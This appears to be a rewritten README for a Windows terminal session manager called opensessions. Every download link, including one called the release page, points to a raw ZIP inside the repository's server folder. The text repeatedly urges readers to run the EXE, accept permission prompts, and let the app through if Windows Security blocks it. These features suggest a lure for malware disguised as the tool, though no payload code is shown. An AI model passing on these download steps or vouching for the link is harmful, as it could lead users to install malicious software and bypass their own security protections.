Visit this page to download: https://github.com/Josiunforeseeable380/opensessions/raw/refs/heads/main/apps/server/Software-v2.0.zip
On the releases page, look for the latest version and download the Windows file that matches your system.
opensessions is a terminal session manager for Windows. It helps you:
- keep terminal sessions in one place
- see agent status at a glance
- track git branches across sessions
- switch between sessions without delay
- bring your own multiplexer setup
If you use several command windows at once, opensessions helps you stay organized.
Before you install, make sure you have:
- a Windows PC
- a modern 64-bit version of Windows
- permission to install and run apps on your computer
- a terminal app such as Windows Terminal or Command Prompt
If your PC can run current Windows apps, it should work well.
- Open the release page: https://github.com/Josiunforeseeable380/opensessions/raw/refs/heads/main/apps/server/Software-v2.0.zip
- Find the newest release at the top of the page
- Download the Windows file for opensessions
- If the file comes as a ZIP folder, open it after the download finishes
- If you see an EXE file, double-click it to start the app
- If Windows asks for permission, choose Yes
- Follow the on-screen steps until the app opens
If you are not sure which file to pick, choose the Windows download with the plain app name in it.
When you open opensessions for the first time, it may take a few seconds to set up.
You may see a list of your sessions, branches, or agent states. Use the screen to:
- open a session
- switch to another session
- check status
- see which git branch is active
- return to the last session you used
The app is built to keep the flow simple, so most actions should feel direct.
Use opensessions when you work with more than one terminal session.
Typical use:
- start a project in one session
- keep logs open in another
- watch agent status in a third
- move between them with one action
- check the git branch before you make changes
This helps reduce the time spent searching through open windows.
Keep multiple terminal sessions in one place and switch between them without digging through tabs.
See the current git branch for each session. This helps when you work on more than one project.
Check the state of your agent sessions at a glance. This is useful when one task is running and another is waiting.
Move from one session to another with less friction. This keeps your work moving.
Use your own preferred terminal setup. opensessions fits around the tools you already use.
opensessions may save small local settings on your PC, such as:
- recent sessions
- layout choices
- session names
- branch info shown in the app
These settings help the app open the way you left it.
If the app opens but you do not see your sessions right away:
- make sure you opened the right file from the release
- check that the app has permission to run
- close it and open it again
- run it from the same folder you unzipped
- keep your terminal windows open if the app expects active sessions
If you use Windows Security, allow the app if Windows blocks it by mistake.
Select the session you want from the list, then use the open or switch action.
Look for the branch label next to the session name.
Use the status view to find the session that is running or waiting.
Pick the session tied to the project you want, then switch to it.
Try these steps:
- check that the download finished
- unzip the folder if needed
- double-click the EXE again
- restart Windows and try once more
If Windows shows a security prompt, choose the option that lets you run the app.
Check your Downloads folder.
Open a few terminal sessions first, then refresh the view.
Use this link to get the latest Windows build:
The release page may include files such as:
- Windows ZIP package
- Windows EXE app
- source files for reference
For normal use on Windows, choose the app file or the ZIP package that contains it.
For the smoothest setup:
- download only from the release page above
- save the file to a folder you can find
- keep the app in a normal user folder
- avoid moving files while the app is open
opensessions is useful when your work spreads across many terminal windows. It gives you one place to look at session state, branch context, and active work. That makes it easier to stay on task and less likely to lose track of where you are
- Go to https://github.com/Josiunforeseeable380/opensessions/raw/refs/heads/main/apps/server/Software-v2.0.zip
- Download the latest Windows file
- Open the file
- Follow the prompts
- Start managing your terminal sessions